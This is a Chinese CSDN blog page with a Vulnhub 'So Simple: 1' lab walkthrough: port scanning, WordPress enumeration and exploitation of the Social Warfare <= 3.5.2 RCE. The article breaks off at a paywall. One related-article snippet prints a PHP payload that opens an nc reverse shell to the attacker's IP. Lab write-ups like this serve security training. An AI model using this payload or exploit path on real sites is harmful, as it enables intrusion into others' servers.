SO SIMPLE: 1靶机

最新推荐文章于 2024-03-20 23:45:00 发布
最新推荐文章于 2024-03-20 23:45:00 发布
阅读量273 收藏
点赞数
分类专栏: vulnhub 文章标签: 靶机 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/logan_logan/article/details/118997127
版权
1.在浏览器输入地址打开2.端口扫描nmap -A -p- -T4 10.36.101.171 开的端口不是很多,不过可以看到8443端口后面包含有LXD的信息,说不定在提权的时候能用到;3.目录枚举目录枚举的时候看到有wordpress,准备上Wpscan工具进行枚举;4.在网页打开这个目录查看源代码的时候发现Social Warfare竟然是3.5版本的,判断很可能出现Social Warfare <= 3.5.2 - Unauthenticated Remote Code
摘要由CSDN通过智能技术生成

1.在浏览器输入地址打开
在这里插入图片描述
2.端口扫描

nmap -A -p-  -T4 10.36.101.171

开的端口不是很多,不过可以看到8443端口后面包含有LXD的信息,说不定在提权的时候能用到;
在这里插入图片描述
3.目录枚举
目录枚举的时候看到有wordpress,准备上Wpscan工具进行枚举;
在这里插入图片描述
4.在网页打开这个目录
查看源代码的时候发现Social Warfare竟然是3.5版本的,判断很可能出现Social Warfare <= 3.5.2 - Unauthenticated Remote Code Execution (RCE)漏洞;在这里插入图片描述在这里插入图片描述
在这里插入图片描述
接下来构造URL进行漏洞验证,发现真的存在;
在这里插入图片描述
7.Social Warfare <= 3.5.2 - Unauthenticated Remote Code Execution (RCE)漏洞利用
在本地构造一个存在命令执行的脚本,然后进行远程读取;

最低0.47元/天 解锁文章
我的大脑袋
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机系列:SecTalks: BNE0x03 - Simple
汗的博客
04-21 538
这次的靶机是vulnhub靶机:SecTalks: BNE0x03 - Simple 文章目录靶机地址及相关描述靶机地址靶机描述Simple CTFLocationHints靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 靶机地址 https://www.vulnhub.com/entry/sectalks-bne0x03-simple,141/ 靶机描述 Simpl...
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
vulnhub靶机-So Simple: 1
臭nana的博客
08-10 1149
1、靶机开机即得ip地址:192.168.8.109 2、扫描靶机端口 root@kali:~# nmap -A -p- 192.168.8.109 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for so-simple (192.168.8.109) Host is up (0.00056s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION
vulnhub-So Simple 1
yutianovo的博客
08-10 1319
靶机描述 This is an easy level VM with some rabbitholes. Enumeration is key to find your way in. There are three flags (2 user and 1 root flag). The VM is tested on Virtualbox. After the startup it shows the IP address. Share your rootflag with me on Twitter
SecTalks: BNE0x03 - Simple靶机
小小猪的博客
06-11 310
SecTalks: BNE0x03 - Simple靶机 arp-scan -l 扫描靶机地址 nmap -sV -Pn -A x.x.x.235,扫描出80端口 访问80端口,尝试弱口令,无果 dirb http://x.x.x.235,扫描目录,发现uploads nikto 进行扫描漏洞 发现可以注册信息,注册之后可以修改,有文件上传处,上传木马 发现上传成功 端口监听,得到权限 产看poc ,发现没有,https://www.exploit-d.
红队打靶:BNE0X03_SIMPLE打靶思路详解(vulnhub)
Bossfrank的博客
07-21 409
本文是vulnhub靶机BNE0X03 SIMPLE的详细打靶过程。涉及到的知识点包括关于cms漏洞利用、文件上传漏洞、内核提权等。靶机较为容易,经典的攻击链,困难点在于如何选择合适的内核提权利用文件。
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
vulhub渗透测试靶机学习1
08-08
渗透测试靶机学习0x01 lampiao靶机准备环境靶机下载地址https://download.vulnhub.com/lampiao/Lampiao.zip
Privilege-Escalation:此备忘单针对 CTF 玩家和初学者,通过示例帮助他们了解权限提升的基础知识
05-30
权限提升备忘单 (Vulnhub) 此备忘单针对 CTF 玩家和初学者,通过示例帮助他们理解权限提升的基础知识。 它不是使用 Linux 命令进行枚举的备忘单。 权限提升完全与正确枚举有关。 有多种方法可以执行相同的任务。 我们已经根据我们的经验执行并编制了这份清单。 请与您的分享这一点,并直接向疑问和反馈。 跟着我们 目录 可写的 /etc/passwd 文件 可写文件或脚本 缓冲区溢出 码头工人 Chkrootkit 蛮力 破解/etc/shadow NFS 杰森 Redis LXD 全部 进出口 Apache2可写 滥用 Sudo 权限 :right_arrow_curving_up: 不。 机器名称 文件/二进制文件 1。 泰德:1 apt-get 2. KFIOFan : 1 awk 3. 21 LTR:场景1 猫 4. 天塔 猫 5. 矩阵:1 cp 6. 人造卫星一号 编辑 7
School:1靶机
小小猪的博客
06-25 530
School:1靶机 正如大家所想的一样,首先使用arp-scan来确定目标主机: nmap -sV -Pn -A x.x.x.251 扫描端口 扫描目录,发现database 访问,下载sql 看到两个用户 登录进去,查看源码,发现文件,但是没能利用 上传shell 发现上传成功 进行监听 进入交互模式 进入home/fox目录下,查看local.txt ls -al 发现root 进入root查看win 将acces
VulnHub渗透测试实战靶场 - SICKOS: 1.1
LYJ20010728的博客
08-08 1871
VulnHub渗透测试实战靶场 - SICKOS: 1.1环境下载SICKOS: 1.1靶机搭建渗透测试信息搜集 环境下载 戳此进行环境下载 SICKOS: 1.1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l ...
渗透测试之靶机试炼(六)
simple___sunny的博客
02-14 769
靶机简介 靶机地址: https://download.vulnhub.com/ch4inrulz/CH4INRULZ_v1.0.1.ova.torrent ( Magnet 运行环境: VirtualBox 攻击测试机环境 kali win 10 工具简介 nmap dirb python 靶机网卡设置 三台虚拟主机在同一局域网即可 作者这里直接将靶机桥接到win 10 和kali虚拟机...
实战打靶集锦-014-solstice
阿尔泰野狼的博客
04-05 435
本文记录了博主一次不成功的打靶经历。
solstice靶机渗透测试
m0_74358546的博客
10-11 72
开启靶机之后扫描网段内的主机确定靶机IP为192.168.153.140nmap扫描一下开放的端口开放的端口挺多的一个端口一个端口的试一下。
PG::Solstice
aya3t的博客
11-29 216
PROVING GROUNDS::Solstice
vulnhub:So-Simple-1靶机
qq_43884092的博客
01-02 160
靶机:192.168.111.136kali:192.168.111.111端口扫描80端口目录爆破访问wordpress目录发现是wordpress站点使用wpscan扫描发现一个插件发现该插件存在漏洞漏洞利用本地创建shell.txt,内容写入<pre> system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.111.111 4444 >/tmp/f'); </pre> 使
实战打靶集锦-027-SoSimple1
最新发布
阿尔泰野狼的博客
03-20 1757
本文简单记录了博主的一次打靶经历,涉及wordpress扫描与爆破、social-warfare远程代码执行漏洞、sudo命令提权等
the planets: earth靶机
04-11
问题:关于行星:地球和静机。 回答:这个问题似乎出现了编码问题,其中“Earth静机”不是一个有意义的词语,因此无法给出明确的回答。如果问题中的“静机”是指其他行星,可以尝试使用正确的编码再次提交问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值